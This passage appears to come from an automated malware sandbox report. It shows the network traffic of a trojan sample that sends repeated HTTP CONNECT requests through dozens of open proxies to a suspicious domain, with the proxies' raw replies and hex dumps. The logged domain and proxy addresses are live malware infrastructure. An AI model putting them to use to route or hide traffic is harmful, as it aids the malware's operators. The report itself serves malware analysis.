6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                434192.168.2.85105391.121.88.53805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.848896980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.876111984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882623911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.507745981 CET60INHTTP/1.0 200 Connection Established
                                                                                Proxy-agent: Apache


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                435192.168.2.85151954.38.179.203238145828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.849575043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352794886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.898092031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882637024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847692966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781616926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.695029020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.556263924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.164736986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                436192.168.2.850922103.180.1.24211115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.855437994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.882421970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.581716061 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                437192.168.2.851476211.222.252.18781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.860044003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                438192.168.2.85151331.223.22.2110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.884437084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                439192.168.2.850953103.78.0.4431295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.889836073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991591930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                440192.168.2.8514988.213.129.2080815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.892595053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.173938036 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                441192.168.2.85108172.167.221.145604045828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.900882959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991648912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991920948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991923094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.991699934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.991633892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.085478067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                442192.168.2.851296103.148.57.103300075828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.910047054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.556440115 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                443192.168.2.85154837.187.73.7640525828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.911389112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352849960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.898138046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882716894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847755909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882467985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898212910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820565939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.585875988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                444192.168.2.850994128.199.221.91296035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.921077013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991770029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991916895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991939068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.991718054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.991653919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.085474968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                445192.168.2.85156072.195.34.60273915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.926126957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                446192.168.2.85148941.70.106.156785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.947424889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                447192.168.2.8514615.42.78.239157585828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.948107004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.788598061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.195040941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.695771933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695291042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.695344925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.687231064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                448192.168.2.85156272.195.101.9941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.960752010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                449192.168.2.851003103.78.96.14681815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.983767033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.775299072 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                450192.168.2.85156472.195.114.18441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.985903978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                451192.168.2.851538173.249.30.19781185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.986479998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.351448059 CET131INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                452192.168.2.8515168.213.129.15505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.986538887 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:27.299817085 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                453192.168.2.85150860.188.102.225180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.989711046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                454192.168.2.85156672.195.34.4241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.995482922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                455192.168.2.851533213.233.178.13731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.996376038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.306163073 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                Server: squid/4.10
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3705
                                                                                X-Squid-Error: ERR_DNS_FAIL 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                456192.168.2.8507595.180.19.20910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.040935040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                457192.168.2.85154423.226.4.102805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.040935993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.409630060 CET531INHTTP/1.1 405 Method Not Allowed
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Allow: OPTIONS,HEAD,GET,POST
                                                                                Content-Length: 331
                                                                                Content-Type: text/html; charset=iso-8859-1
